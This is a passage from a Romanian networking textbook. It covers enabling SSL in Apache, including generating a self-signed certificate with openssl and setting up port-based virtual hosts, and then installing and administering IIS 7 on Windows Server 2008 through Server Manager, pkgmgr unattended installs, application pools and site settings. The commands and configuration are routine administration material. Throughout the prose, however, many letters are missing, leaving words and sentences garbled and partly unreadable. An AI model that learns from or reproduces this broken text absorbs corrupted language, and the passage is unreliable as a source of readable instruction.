Totodată, se e ul t e uie o figu at să as ulte o e iu i pe po tul dedi at

o e iu ilo HTTP“. Pe t u a easta t e uie adăugată li ia Listen 443 la fişie ul ports.conf:
ragnarok:~# cat /etc/apache2/ports.conf
Listen 80
Listen 443
9.3.2 Generare certificat

Pentru a asigura confide ţialitatea o u i aţiei di t e se e şi lie t a t e ui ge e at u
e tifi at. Ce tifi atul a fi folosit lo al fă ă a fi se at de o auto itate CA şi a ge e a u ele
a e tis e te. Pe t u ge e a ea u ui e tifi at se foloseşte o a da openssl:
ragnarok:~# openssl req $@ -new -x509 -days 365 -nodes -out /etc/apache2/apache.pem -
keyout
/etc/apache2/apache.pem
Generating a 1024 bit RSA private key
......................................................++++++
....++++++
writing new private key to '/etc/apache2/apache.pem'
[…]
-----
Country Name (2 letter code) [AU]:RO
State or Province Name (full name) [Some-State]:Bucharest
Locality Name (eg, city) []:Bucharest
Organization Name (eg, company) [Internet Widgits Pty Ltd]:University Politehnica of
Bucharest
Organizational Unit Name (eg, section) []:Computer Science
Common Name (eg, YOUR name) []:Razvan Deaconescu
E-mail Address []:razvan.deaconescu@cs.pub.ro
Ce tifi atul t e uie să fie a esi il doa utilizato ului root:

ragnarok:~# chmod 600 /etc/apache2/apache.pem
9.3.3 Configurare virtual host

Pe t u a folosi supo tul ““L a t e ui o figu at i tual host a e să as ulte o e iu i pe
po tul şi să foloseas ă fa ilităţile odulului mod_ssl. Pe t u a easta se î lo uieşte
directiva NameVirtualHost * î fişie ul /etc/apache2/conf.d/virtual.conf creat în
se ţiu ea 9.2.4.3:
ragnarok:~# cat /etc/apache2/conf.d/virtual.conf
NameVirtualHost 88.77.66.55:80
NameVirtualHost 88.77.66.55:443
Este, aşada , e oie de două virtual host-uri: unul care va asculta conexiuni necriptate pe
po tul şi altul a e a as ulta o e iu i iptate pe po tul . “e poate o se a ă, sp e
deose i e de găzdui ea i tuală azată pe u e, la găzdui ea i tuală azată pe po tu i este
e esa ă p eze ţa ad esei IP, o side ată ai i 88.77.66.55. Pe t u a easta, se eează o
opie a fişie ului de o figu aţie pe t u virtual host-ul i pli it şi se a ti ează folosi d
a2ensite:
ragnarok:~# cp /etc/apache2/sites-available/default /etc/apache2/sites-available/ssl
ragnarok:~# a2ensite ssl
Site ssl installed; run /etc/init.d/apache2 reload to enable.
Virtual host-ul i pli it a as ulta o e iu i pe po tul şi a t e ui î lo uită li ia

<VirtualHost *> cu <VirtualHost 88.77.66.55:80>. VirtualHost-ul ssl va asculta
o e iu i pe po tul şi a ofe i supo t ““L:
ragnarok:~# head -n 1 /etc/apache2/sites-enabled/000-default
<VirtualHost 88.77.66.55:80>
ragnarok:~# head -n 5 /etc/apache2/sites-enabled/ssl
<VirtualHost 88.77.66.55:443>
SSLEngine On
SSLCertificateFile /etc/apache2/apache.pem
Directiva SSLEngine On a ti ează supo tul ““L ia di e ti a SSLCertificateFile

p e izează e tifi atul ge e at î se ţiu ea 9.3.2
După toate o figu ă ile, se epo eşte se e ul:
Ve ifi a ea o figu aţiei se fa e p i folosi ea U‘L-urilor http://88.77.66.55, respectiv

https://88.77.66.55:443 pe t u o e iu e iptată. Î lo ul ad esei IP poate fi folosit
u ele de do e iu al staţiei Fully Qualified Domain Name – FQDN).
9.4 IIS 7 şi Windows Server 2008

Internet Information Services II“ ep ezi tă alte ati a Mi osoft pe t u se e ele de
pagi i e . Î o e tul de faţă, II“ a aju s la e siu ea , e siu e e este i lusă i pli it î
variantele Windows Server 2008.
E ide t, e siu ile p i a e II“ a t e ut pâ ă a u au e istat î p i ul â d di i te ţia de
a spo i g adul de se u itate şi de a epa a e o ile i t oduse î e siu ile p e ede te. II“ . ,
sp e e e plu, a ep eze tat doa o a ia tă u fu ţio alitate spo ită a lui II“ . De ase e ea,
i stala ea e siu ilo a te ioa e lui a ea a efe t i stala ea ap oape a tutu o fa ilităţilo î
od i pli it, lăsâ d ad i ist ato ului doa âte a o po e te opţio ale e puteau fi
i stalate la e e e. Cel puţi di a est pu t de ede e, e siu ea este supe ioa ă şi p i t -
u g ad ult ai idi at de g a ula itate, î e â d să espe te „ideea pe a e Mi osoft a
introdus-o odată u Windows Server 2008 şi o ti uă să o p o o eze: „ceea ce nu se
i stalează u t e uie î t eţi ut 1.
A eastă ouă e siu e este p i a e o st uită de la ze o şi o epută di sta t pe t u a fi
odula izată. A est lu u, pe de o pa te, edu e di o ple itatea sup afeţei e puse
ata u ilo şi, pe lâ gă u spo de se u itate, ajută la i i iza ea ti pilo „ o ţi î
î t eţi e ea se e elo auzaţi de s hi ă i de software, a tualiză i şi odifi ă i i po ta te î
o figu aţii. De ase e ea, şi i te faţa de ad i ist a e a fost efe ută, e u ţâ du-se la
e hea i te faţă i t odusă î e siu ea . A easta adu e u plus di pu tul de ede e al
o ga iză ii şi al st u tu ă ii sa i ilo , fii d o epută a u dashboard (în stilul Server
Manager şi Control Panel).
Modularitatea componentelo lui II“ este fa ilitată şi p i faptul ă a u ad i ist ato ii
e efi iază de opţiu ea de a delega u u ă se ifi ati de sa i i hia dez oltato ilo sau
proprietarilor site-u ilo e . Pe t u u se e a e găzduieşte u u ă a e de site-uri web
da al ă ui ad i ist ato u deţi e d eptu ile de p op ietate asup a o ţi utului lo , a eastă
etodă de delega e ofe ă o soluţie ade ată. Detaşa ea a u ito espo sa ilităţi u o te ţe
persoane într-u od se u izat, eli i ă astfel espo sa ilitatea administratorului serverului
pe t u s hi ă i uşo de efe tuat asup a site-urilor. De obicei aceste drepturi permit
s hi ă i e u afe tează sta ilitatea, i teg itatea sau se u itatea se e ului pe a e a estea
ulează.
De ase e ea, e siu ea ofe ă şi utilta e adiţio ale de o ito iza e a pe fo a ţei şi de
tratare a erorilor ce nu existau în versiunile anterioare. Spre exemplu se poate vizualiza fiecare
e e e e ită sp e se e pe t u a se depista u uşu i ţă auza u ei p o le e sau di e
lo aţie sau e apli aţie foloseşte esu sele se e ului.
II“ a e la ază u oto o plet ou, o eput pe t u a ad esa eaju su ile e siu ilo
p e ede te, a â d î ede e atât efo tul de e te a ţă di pa tea ad i ist ato ilo ât şi
e esităţile dez oltato ilo de apli aţii e .
1
Original, eng.: What does ’t get i stalled o ’t eed to get pat hed.
334 | ‘ e ţ e l e L o a l e
9.4.1 Avantajele lui IIS 7

II“ a fost o eput pe t u a ofe i ad i ist ato ilo şi dez oltato ilo u ătoa ele
fa ilităţi:
 U odel e te si il şi odula pe t u a spo i uşu i ţa ad i ist ă ii şi a i i iza is u ile de
securitate;
 Posibilitatea de a delega sarcini administrative;
 U elte de o ito iza e şi diag o sti i luse î apli aţie, fa ilitâ d a esul la e a is ul
i te de fu ţio a e al II“;
 I te faţă de ad i ist a e ai i tuiti ă;
 Instalare prin Xcopy.
IIS 7 permite delegarea de sarcini administrative dezvoltatorilor sau proprietarilor de site-

u i. I stala ea este a u o plet usto iza ilă şi pe ite sele ta ea spe ifi ă a
o po e telo do ite sp e a fi i stalate şi utilizate. Dez oltato ii e fi iază a u de API-uri
(Application Programming Interface ult ai o ple e şi ai apa ile. Tot a este API-uri
pe it şi ad i ist ato ilo , pe de altă pa te, să i te a ţio eze p i od, se e ul folosi d
namespace-ul Microsoft.Web.Administration, sau prin WMI (Windows Management
Instrumentation . “ta ea se e ului poate fi i spe tată folosi d se i ii de tip WCF Windows
Communication Foundation) ca WAS (Windows Activation Service , a e ofe ă posi litatea de
a age e t al esu selo , de i spe ţie la i el de p o es şi de dete ta e auto ată a e orilor.
“p e e e plu, da ă o e e e e pi ă î ti p î ai te a a easta să fie e e utată, II“ poate
pa u ge şi des ie î se s i e s odul e a fost e e utat pâ ă la ge e a ea a esteia, pe t u a
ofe i o i agi e ât ai i tuiti ă asup a auzei p o le ei.
Fu ţio alitatea i te ă a se e ului este a u ult ai e pusă, pe iţâ d î o i e
o e t o ito iza ea a ti ităţii i te e, a e e ilo sosite, a esu selo a esate şi a a ţiu ilo
e e utate. Pe lâ gă i te faţa g afi ă de ad i ist a e, II“ ofe ă şi o i te faţă î li ie de
o a dă u ită appcmd.exe e poate fi folosită pe t u a izualiza şi a odifi a o se ie
se ifi ati ă de opţiu i ale se e ului.
Î fi e, u a di t e ele ai spe ta uloase î u ătăţi i i t oduse odată u II“ este
posibilitatea de a ig a şi de a dist i ui e t e de uşo o figu aţii î t e se e e ultiple
folosind Xcopy şi fişie e de tip web.config. Î a este fişie e pot fi sto ate i fo aţii
efe itoa e la apli aţie sau la di e se site-u i şi si pla opie e a a esto fişie e pe u ou
se e a e a afe t a ti a ea i ediată a oii o figu aţii. A eastă fa ilitate, deşi i lusă pe t u
p i a oa ă î II“, a e istat î alte se e e e de ulţi a i.
9.4.2 Instalarea IIS 7
9.4.2.1 Instalarea din Server Manager

Instalarea lui IIS 7 pe un sistem Windows Server 2008 de u ge o fo paşilo u ăto i.
Nu este e esa ă des ă a ea de pe I te et a eu ui pa het de i stala e sau a u ei
o figu aţii.
1. Se deschide Server Manager (din meniul Start > Administrative Tools sau direct din
Quick Launch);
2. “e sele tează opţiu ea Add Roles di se ţiu ea Roles Summary (sau se face clic pe Roles în
a o ele di pa tea stâ gă pe t u a afişa doa a eastă se ţiu e ;
3. “e e ifi ă o diţiile e pli ate î e a ul afişat şi se apasă Next î spe ial e e o a dată
asignarea unei adrese IP stati e î p eala il pe i te faţa de pe a e se o p i i e e ile, a şi î
cazul altor servere);
4. Din ecranul Select Server Roles se sele tează Web Server (IIS);
9-2: Instalarea componentelor suplimentare necesare pentru IIS 7
5. Da ă este e esa , i stala ea a ate ţio a î legătu ă u faptul ă su t e esa e şi alte

o po e te pe t u fu ţio a ea II“, a î figu a 9-2. “e adaugă fa ilităţile e esa e şi se
co ti uă;
9-3: Lista de o po e te opțio ale pe tru II“
6. Se trece şi de u ătoul e a i fo ati şi se aju ge la lista de opţiu i ale se e ului. Î

fereastra Select Role Services sunt enumerate principalele componente ale IIS. Aici se poate
336 | ‘ e ţ e l e L o a l e
spe ifi a da ă se i te ţio ează a se e ul să supo te pagi i A“P, s ipt-u i CGI, să o t oleze
un server FTP, etc1.
7. “e e izuies opţiu ile sele tate pe t u i stala e şi se apasă Install pentru a porni instalarea;
8. Se î hide utilita ul de i stala e, după te i a e.
Alege ea o po e telo opţio ale u este defi iti ă după i stala ea se e ului. A estea
pot fi instalate sau dezinstalate ulterior tot din Server Manager, din pagina de diagnostic a
Web Server (IIS) localizată su atego ia Roles, p i opţiu ile Add Role Services şi Remove Role
Services.
9-4: Adăugarea şi eli i area de o po e te di II“ după i stalare
9.4.2.2 I stalarea auto ată Unattended Installation)

În cazul în a e i stala ea II“ t e uie fă ută pe ai ulte se e e ia o figu a ea
a estuia este ap o i ati si ila ă pe toate se e ele, p o esul de i stala e poate fi
automatizat. Pentru aceasta poate fi folosit utilitarul pkgmgr.exe î două odu i: se pot
specifi a pa hetele de i stalat di e t î li ia de o a dă sau se poate s ie u fişie XML u
lista opţiu ilo e se do es a fi i stalate.
Di o e t e II“ este depe de t de WA“ aşa u s-a spe ifi at şi la i stala ea p i
Server Manager), componentele acestuia vor trebui specificate explicit în comanda de
i stala e sau î fişie ul XML.
Pentru instalarea componentelor implicite ale IIS 7 folosind doar interpretorul de comenzi,
se i t odu e u ătoa ea o a dă. De e a at e u e a ea o po e telo faţă de are IIS 7
a e depe de ţe:
Start /w pkgmgr.exe /iu:IIS-WebServerRole;WAS-WindowsActivationService;WAS-
ProcessModel;WAS-NetFxEnvironment;WAS-ConfigurationAPI
Pe t u a auto atiza i stala ea folosi d u fişie XML, se eează u ul u u ăto ul

o ţi ut:
<?xml version="1.0" ?>
<unattend xmlns="urn:schemas-microsoft-com:unattend"
xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State">
<servicing>
<package action="configure">
<assemblyIdentity
name="Microsoft-Windows-Foundation-Package"
version="6.0.6001.17051"
language="neutral"
processorArchitecture="x86"
publicKeyToken="31bf3856ad364e35"
versionScope="nonSxS"
/>
<selection name="IIS-WebServerRole" state="true"/>
<selection name="WAS-WindowsActivationService" state="true"/>
<selection name="WAS-ProcessModel" state="true"/>
<selection name="WAS-NetFxEnvironment" state="true"/>
<selection name="WAS-ConfigurationAPI" state="true"/>
</package>
</servicing>
</unattend>
9-5: Co ți utul u ui fişier XML de i stalare u opțiu i i pli ite pe tru II“
1
Deoa e e lista de o po e te este p ea astă pe t u a fi i lusă ai i, ea poate fi o sultată pe I te et
la adresa http://technet.microsoft.com/en-us/mscomops/cc403255.aspx
Câte a di t e optiu ile di fişie ul XML t e uie spe ifi ate ţi â d o t de aşi a pe are
se ealizează i stala ea:
 Valoarea atributului version t e uie să fie aloa ea e a tă a i stală ii de Windows Server
2008. A easta se poate afla la se ţiu ea Details di pagi a de p op ietăţi a fişie ului
explorer.exe (direct în directorul %WINDIR%);
 Valoarea atributului processorArchitecture a t e ui să o espu dă u p o eso ul i stalat
pe siste ul u e t. Opţiu ile su t: x86, x64 şi amd64;
Utiliza ea fişie ului XML eat se fa e tot di li ia de o a dă. P esupu â d ă a fost

salvat cu numele unatt_inst.xml, o a da este u ătoa ea:
Start /w pkgmgr /n:c:\unatt_inst.xml
De ase e ea, a este o e zi su t dispo i ile şi î a ia ta Server Core a Windows Server

2008, ele ep eze tâ d hia odalitatea de i stala e a II“ pe a eastă a ia tă de Wi do s.
9.4.3 Interfaţa de administrare

O s hi a e se ifi ati ă î oua e siu e de II“ o ep ezi tă i te faţa sa de
administrare: IIS Manager. La o i stala e u setă ile i pli ite, a easta se i stalează auto at.
IIS Manager poate fi accesat prin: Start > Administrative Tools > Internet
Information Services (IIS) Manager sau p i u ele e e uta ilului său, i t odus di e t
în fereastra de Run sau la Search, în meniul Start: InetMgr.exe.
9-6: Consola de management a IIS 7
Î zo a p i ipală a fe est ei su t e u e ate ulti ele se e e sp e a e au fost ealizate

o e iu i, âte a sa i i uzuale şi legătu i de ajuto pe I te et.
Î zo a di pa tea stâ gă su t e u e ate dife ite o e iu i ăt e se e e II“ . Î od
implicit doa se e ul lo al este afişat su fo a u elui al ulato ului pe a e ulează, fii d
aso iat a estuia. Co e iu ile oi pot fi adăugate p i uto ul Create New Connection, de
deasup a listei. Pe t u a a esa setă ile se e ului u e t, se fa e li pe u ele său:
338 | ‘ e ţ e l e L o a l e
9-7: I terfața de proprietăți a ser erului lo al
Î pa oul de o e iu i, su se e ul lo al se găses alte două ele e te: Application Pools

şi Sites.
O apli aţie, î se sul II“, se efe ă la o apli aţie e este ulată p i i te ediul II“ şi a e
poate fi o apli aţie e . U Application Pool poate o ţi e ai ulte astfel de apli aţii ia
utilitatea sa o stă î faptul ă pe ite ad i ist ato ului să o figu eze u a u it i el de
izolare între dife itele apli aţii găzduite pe se e . “p e e e plu, toate apli aţiile e pot fi
i luse î a elaşi Application Pool. Tot î a est o te t, g upa ea apli aţiilo poate fi fă ută şi
din cosiderente de securitate. Fiecare Application Pool ulează î t -un proces separat, ceea ce
o stituie u alt a a taj: e o ile apă ute î t -unul dintre Application Pool-uri nu vor putea
afe ta fu ţio alitatea elo lalte apli aţii. Î lipsa u o Application Pool-uri definite manual de
ăt e ad i ist ato , toate apli aţiile de pe se e o ula î a elaşi Application Pool, cel
implicit.
Un Appplication Pool poate fi considerat, ca o privire de ansablu, ca un server web virtual,
de si e stătăto . ‘esu se a i elul de o upa e al p o eso ului sau a titatea de e o ie ‘AM
utiliza ilă pot fi o figu ate pe t u fie a e Application Pool î pa te. Pe t u uşu a ea
î t eţi e ii lo , ele pot fi p og a ate pe t u a se esta ta pe iodi sau a se op i auto at î
momentul în care sunt detectate prea multe erori într-un interval de timp dat.
Pot fi create oricât de multe Application Pool-u i se do eşte, da t e uie a ut î ede e
faptul ă fie a e a o su a esu sele siste ului ia ea ea u ui p o es pe t u fie a e a
adăuga u su plus la î ă a ea scheduler-ului de procese din sistem. Un sistem desktop
decent poate suporta aproximativ 25 de Application Pool-u i fă ă deg adă i se ifi ati e de
pe fo a ţă. Fa to ii a e i flue ţează u a ul de Application Pool-uri suportate de sistem
sunt:
 P o eso ul şi e o ia siste ului
 Nu ă ul apli aţiilor din pool-u i şi tipul lo
 Nu ă ul de e e i de p o esat pe t u a este apli aţii
 Resursele consumate de alte procese sau servere instalate în sistem
Cel de-al doilea element din panoul Connections îl ep ezi tă Sites, ce cuprinde toate site-
urile web ce sunt configurate pe serverul curent. Tipurile de site-u i e pot fi găzduite pe
se e depi d de odulele opţio ale alese la i stala e sau ulte io . I pli it, folosi d
o figu aţia de ază de la i stala e, II“ poate se i doa pagi i stati e fişie e HTML). Pentru
pagi ile e i lud o ţi ut di a i , a A“P Active Server Pages), ASP.NET, PHP sau CGI
(Common Gateway Interface e e esa ă adăuga ea u o odule supli e ta e.
9-8: Pagi a de proprietăți a unui site
Î pa oul e t al pot fi izualizate fie p op ietăţile u ui site, fie o ţi utul său fişie ele
propriu-zise şi st u tu a de di e toa e . Pe t u a s hi a î t e a este două odu i, e istă
butoanele Features View şi Content View în partea inferioa ă. De ase e ea, p op ietăţile pot
fi g upate după fu ţii şi afişate î ai ulte odu i, î stilul Wi do s E plo e .
Î fi e, pa oul di pa tea d eaptă, Actions, ofe ă a esul apid la dife ite o e zi şi a ţiu i
o te tuale, î fu ţie de e ele e te su t sele tate î pa oul de p op ietăţi sau î a o ele
de o e iu i di pa tea stâ gă. De ai i se poate po i sau op i se e ul da ă este sele tat î
pa tea stâ gă , se pot a ti a sau deza ti a site-u i, se pot izualiza şi a esa pagi ile de
modificare a p op ietăţilo lo şi se pot des hide apid site-urile direct în browser.
Ate ţie! Po i ea, op i ea sau esta ta ea se e ului II“ poate fi fă ută atât di i te faţa sa
de a age e t ât şi di “e e Ma age , la sele ta ea lui di lista de olu i. Modifi ă ile
efe tuate î u a di t e a este zo e pot să u fie izi ile i ediat î ealaltă. E e o a da il a
pe t u olu ile de se e e deţi i te feţe p op ii de ad i ist a e, să se i te a ţio eze u ele
doar prin intermediul acestora, Server Manager fiind folosit doa pe t u e ifi ă i şi
diag osti ă i. “e e Ma age e efi iază de o opţiu e a e a tualizează odată la fie a e
i ute i fo aţiile afişate. Î pa tea i fe ioa ă se afişează se u da ulti ei a tualiză i şi u
li k pe t u o figu a ea f e e ţei de actualizare.
9.4.4 Adăugarea unui site web

Site-u ile î egist ate pe se e ul lo al su t listate î i te faţa IIS Manager, grupate sub
categoria Sites a serverului din panoul Connections. I pli it, II“ defi eşte u site a esi il
accesibil prin orice interfaţă i lusi ea de loop a k la po tul . Este e o a da il a după
340 | ‘ e ţ e l e L o a l e
i stala ea II“ să se e ifi e fu ţio a ea sa p i a esa ea ad esei http://localhost într-un

browser. Site-ul afişat î od i pli it o ţi e o pagi ă si plă HTML e afişează o i agi e.
După i stala e, si gu ul site defi it este el i pli it, de u it Default Web Site. Pentru a
adăuga u ou p i site, se poate ea u ul ou sau se pot odifi a pa a et ii a estui site
i pli it. Pe t u î eput, el poate fi ede u it p i li d eapta şi Rename. Instalarea lui IIS are
a efe t şi ea ea u ui di e to la ad esa C:\Inetpub\wwwroot e ep ezi tă şi ădă i a
pentru site-ul i pli it. Co ţi utul său poate fi izualizat fie di Wi do s E plo e , fie di
i te faţa de a age e t a II“, sele tâ d site-ul şi alegâ d opţiu ea Content View.
În special la crearea noilor site-u i t e uie a ut î ede e faptul ă II“ i ple e tează u
siste de o figu aţii pe două i elu i: u ul glo al, e afe tează fu ţio a ea î t egului se e
şi, i pli it, a tutu o site-u ilo defi ite î a esta şi u ul la i el de site, pa ti ula izat pe t u
fie a e site adăugat.
Adăuga ea u ui site se fa e u â d etapele de ai jos. De e ţio at ă a este setă i u
su t defi iti e şi pot fi odifi ate î o i e o e t ulte io , după definirea site-ului:
1. În IIS Manager se face clic pe grupul Sites di pa oul de o e iu i şi apoi pe Add Web Site din
panoul Actions. Se deschide fereastra Add Web Site:
9-9: Adăugarea u ui ou site
2. În câmpul Site name poate fi introdus orice nume pentru noul site (numele e folosit doar în
s op ad i ist ati . Totodată, u Application Pool u a elaşi u e a fi eat ia da ă se
do eşte folosi ea u uia deja e iste t u a fi DefaultAppPool, cel implicit) se poate specifica
acest lucru printr-un clic pe butonul Select.
3. În câmpul Physical Path se i t odu e alea sp e lo aţia î a e su t sto ate fişie ele site-ului, ce
ep ezi tă, totodată, şi ădă i a sa. Calea poate des ie o lo aţie de pe se e ul lo al sau una
a esi ilă pe u alt se e , da ă espe tă o e ţia UNC.
UNC U i e sal Na i g Co e tio ep ezi tă u sta da d e îşi a e o igi ile î

comunitatea UNIX. El descrie un mod de adresare folosit pentru a identifica servere,
i p i a te şi alte esu se dintr-o eţea. O ale UNC foloseşte două slash-uri sau backslash-uri
e p e ed u ele staţiei, u â d a dis u ile şi di e toa ele să fie sepa ate p i slash-uri sau
backslash-u i si ple. Lite ele u ităţilo C:, D:, et folosite î DO“/Wi do s u su t utilizate în
UNC.
Un exemplu de cale UNIX este //server/cale iar una DOS/Windows este \\server\cale.
4. Î od i pl it, II“ folseşte o aute tifi a e de tip pass-through pe t u a î e a să a eseze
alea spe ifi ată la pu tul a te io ădă i a . A est tip de aute tifi a e î sea ă ă II“ a
î e a să a eseze o ţi tul site-ului folosindu-se de d eptu ile şi ide titatea utilizato ului
a e efe tuează e e ea. Tot î a est az, fişie ele de o figu a e o fi a esate folosi d
ide titatea o figu ată î Application Pool-ul o espu zăto . Pe t u e e i a o i e, II“
foloseşte d eptu ile u ui utilizato p op iu, IU“‘, o ţi ute p i apa te e ţa la g upul II“_IU“‘“,
a ele eate odată u i stala ea se e ului.
5. În zona de Binding se spe ifi ă p oto olul folosit, HTTP sau HTTPS (securizat), adresa IP1 a
i te feţei pe a e o fi as ultate e e ile şi po tul e le a a epta. I pli it, pe t u HTTP a esta
va fi 80 iar pentru HTTPS va fi 443.
6. Da ă se deţi e u u e de do e iu pe t u a esa ea site-ului, acesta poate fi introdus la Host
name.
După alida ea ofigu aţiei de ai sus şi î hide ea fe est ei, site-ul va fi listat sub grupul
Sites în IIS Manager. Ate ţie la ea ea u ui site u o o figu aţie a î figu a 9-9, care să
fu ţio eze pe toate i te feţele şi po tul , î o diţiile î a e e istă deja site-ul implicit cu
a eleaşi setă i. II“ a ate ţio a u p i i e la a est aspe t.
De ase e ea, ea ea u ui site u o ădă i ă î a e u e istă o pagi ă i de a etu a o
eroare de tip 401.3 – Unauthorized deoa e e setă ile i pli ite ale site-urilor nu permit listarea
o ţi utului di e toa elo î lipsa u ui fişie i de .
9.4.5 Configurarea site-urilor

Opţiu ile şi pa a et ii dispo i ili pe t u o figu a e su t î u ă a e, ai ales având
î ede e apa ilităţile ofe ite de odulele opţio ale e pot fi i stalate î p eu ă u II“. Î
ele e u ează o fi p eze tate âte a fa ilităţi uzuale şi utile pe t u ajo itatea apli aţiilo
web.
9.4.5.1 “etări glo ale ale site-urilor

Co figu ă ile i pli ite pe t u II“ afe tează toate site-urile înregistrate în acesta. Pentru a
a esa a este setă i, î i te faţa de ad i ista e II“, î pa oul de o e iu i, se alege Sites iar în
pa ou de a ţiu i se sele tează Set Web Site Defaults. Este afişată fe eastra din figura 9-10:
 Application Pool ep ezi tă platofo a pe a e o ula site-urile. Implicit, este
DefaultAppPool.
 Physical Path Credentials permite specificarea unui anumit utilizator ce va fi folosit pentru
accesarea resurselor site-urilor. Îl lipsa unuia, se va folosi autentificare de tip pass-through
după u s-a explicat în 9.4.4).
 Physical Path Credentials Logon Type: “pe ifi ă odul de aute tifi a e e a fi folosit pentru a
accesa resursele fizice din spatele unor directoare virtuale. Mai multe despre directoarele
i tuale î se ţiu ea 9.4.8.
 Start Automatically a e a efe t pu e ea î fu ţiu e i ediată a site-ului după ea ea sa.
1
Ad esa IP poate fi spe ifi ată atât î fo at IP ât şi î fo at IP .
342 | ‘ e ţ e l e L o a l e
9-10: “etările i pli ite ale site-urilor IIS
 Connection Limits permite definirea intervalului de time-out pe t u o e iu i, a u ă ului

a i de o e iu i si ulta e a eptate, p e u şi a lă gi ii de a dă a i e e a fi
folosita pe t u a ăspu de e e ilo .
 Enabled Protocols i lude p oto oale a HTTP şi/sau HTTP“ e o fi a ti e i pli it pe t u
toate site-urile definite.
“etă ile o figu ate ai i o fi apli ate tutu o site-urilor defi ite î II“. Bi eî ţeles, fie ă ui
site i se pot odifi a ulte io p op ietăţile î od i depe de t. Pa a et ii de ai sus pot fi
a esaţi şi odifi aţi î o figu aţia fie ă ui site, sele tâ du-l şi alegâ d li kul Advanced
Settings di pa oul de a ţiu i.
Di o e t e setă ile de ai sus su t i luse î atego ia Advanced Settings ale site-
u ilo , î pa ti ula , pa a et ii de ază ai site-urilor (tipuri de documente, securitate, pagini de
e oa e, et pot fi şi ei o figu aţi la i el glo al, o p a ti ă utilă ai ales â d u se e
găzduieşte ai ulte site-u i î udite a teh ologie şi fu ţio alitate. Pe t u a a esa setă ile
de ază ale site-u ilo la i el glo al, se sele tează se e ul di lista de o e iu i ia pa oul
e t al se setează pe Features View.
9.4.5.2 “etări parti ulare ale site-urilor

“ele ta ea u ui site şi alege ea odului de izualiza e Features View are ca efect listarea
u ei se ii de pi tog a e e ep ezi tă legătu i apide sp e di e se atego ii de p op ietăţi
configurabile ale site-ului. O pa te di t e setă ile dispo i ile la i el de site se egăses î
o ti ua e şi la i el de di e to /zo ă a u ui site. Î ge e al, a şi î ie a hia se e -site-
di e to , setă ile ai pa ti ula e, da ă su t o figu ate, p e ed î p io itate pe ele oştenite
de la nivelul superior.
“etă ile de la fie a e atego ie su t, î ea ai a e pa te, e pli ite p i ele î sele:
 Compression: Î od i pli it, î II“ o p esia o ţi utului pagi ilo stati e este a ti ă. II“
ge e ează e siu i o p i ate ale fişie elo etu ate şi foloseşte a eeaşi a ia tă
o p i ată pe t u ai ulte e e i, opti izâ d astfel utiliza e lă gi ii de a dă. A ti a ea
o p esiei o ţi utului di a i este posi ilă p i i stala ea u ui odul sepa at e putea fi
sele tat şi la i stala ea II“ , da t e uie a ut î ede e faptul ă II“ u a sto a î t -o memorie
a he o ţi utul di a i , i a ealiza e o p esia pe t u fie a e e e e î pa te. A eastă
opţiu e este ia ilă doa pe t u edii î a e lă gi ea de a dă este foa te li itată da în
a e iteza de ăspu s a se e ului u este de p i ă i po ta ţă şi, i eî ţeles, u de e istă
e esitatea o ţi utului di a i .
“etă ile o p esiei su t dispo i ile şi la i el de se e se sele tează se e ul di lista de

o e iu i şi se alege Compression din Features View , u de e efi iază de opţiu i
suplimentare:
o Mă i ea i i ă a fişie elo e o fi o p i ate
o Di e to ul te po a î a e su t sto ate a ia tele o p i ate ale fişie elo
Li ita ă i ii a estui di e to , la i el de Application Pool

o
Default Document Page: A eastă opţiu e pe ite spe ifi a ea do u e tului e a fi ăutat şi
etu at da ă e istă î o e tul î a e o e e e u ad esează u a u it fişie , i doa o
lo aţie. Fişie ele ăutate su t de tipul index.html, Default.html, Default.asp, etc. Lista
de fişie e pe ite şi ea a ja ea lo pe t u a defi i o di ea î a e o fi ăutate î lo aţia
ad esată. “e poate adăuga o i e tip de fişie sele tâ d Add î pa oul de a ţiu i. E
e o a da il a o di ea să o ţi ă pe p i a poziţie hia fişie ul e este folosit d ept fişie
i de î site, pe t u a opti iza p o esul de ăuta e. Fişie ele pot a ea două at i ute: Local sau
Inherited, p i ul a ătâ d ă fişie ul a fost defi it lo al ia el de-al doilea ă fişie ul a fost
definit într-o locaţie supe ioa ă î ie a hia de o figu aţie. Fişie ele a ate a Inherited la
nivel de site sunt marcate Local la nivel de server.
 Directory Browsing: Î o e tul î a e II“ p i eşte o e e e e u ad esează u fişie
spe ifi , el a ăuta se e ţial u ul di t e fişie ele defi ite la Default Document Page în acea
lo aţie, pe t u a-l etu a. Da ă u găseşte u astfel de do u e t, a e ifi a da ă lista ea
o ţi utului di e toa elo este a ti ă pe t u a ea lo aţie şi, î az afi ati , a afişa o pagi a
ce listează fişie ele şi di e toa ele de la ad esa espe ti ă, î p eu ă u i fo aţiile sele tate î
Directory Browsing. “e pot afişa i fo aţii legate de dată/ti p, ă i e şi e te sie.
 Error Pages: Cererile HTTP pot genera erori identificate prin coduri numerice. Pentru fiecare
astfel de e oa e, ad i ist ato ul poate defi i etu a ea u ui o ţi ut stati , e e uta ea u ui
a u it U‘L sau etu a ea u ui esaj de edi e ta e. II“ defi eşte i pli it âte a aso ie i î t e
codurile de eroare cele mai des întâlnite şi pagi i stati e. A estea pot fi odifi ate sau
supli e tate u oi i t ă i, di pa oul de a ţiu i. Link-ul Edit Feature Settings permite
alege ea u ui i el de detaliu pe t u pagi ile e des iu e o ile, p e u şi defi i ea u ei pagi i
de eroare globale, pe t u toate odu ile de e oa e e u au o a ţiu e defi ită.
 Handler Mappings: Handler-ele su t ele e tele e p o esează e e ile e ite sp e site-urile
sau apli aţiile II“-ului. II“ dete i ă handler-ul prin care va trata o cerere conform ordinii
definite în pagina de Handler Mappings. Printre handler-ele defi ite i pli it se află şi el de
StaticFile, folosit pe t u etu a ea o ţi utului stati . P i t e at i utele handler-elo afişate
î lista şi e esa e şi la defi i ea u o a oi se u ă ă:
o Request Path: ‘ep ezi tă fişie ul sau e te sia pe t u a e handler-ul se va aplica. Se pot folosi
wildcard-uri (spre exemplu, StaticFIle se apli ă o i ă ui fişie şi a e t e ut u * la Request Path)
o Path Type: Des ie tipul ăii pe t u a e se ealizează apa ea cu handler-ul. Aceasta poate fi cale
sp e u fişie şi/sau sp e u di e to sau poate fi lăsată espe ifi ată.
o Handler: Defi eşte efe ti odulul sau u tip .NET e a ăspu de e e ii.
o Entry Type: Ca şi î azul alto p op ietăţi, handler-ele pot fi defi ite lo al sau pot fi oşte ite de la

nivelurile superioare.
HTTP Response Headers: Când un browser e e o pagi ă e u ui se e , se etu ează u
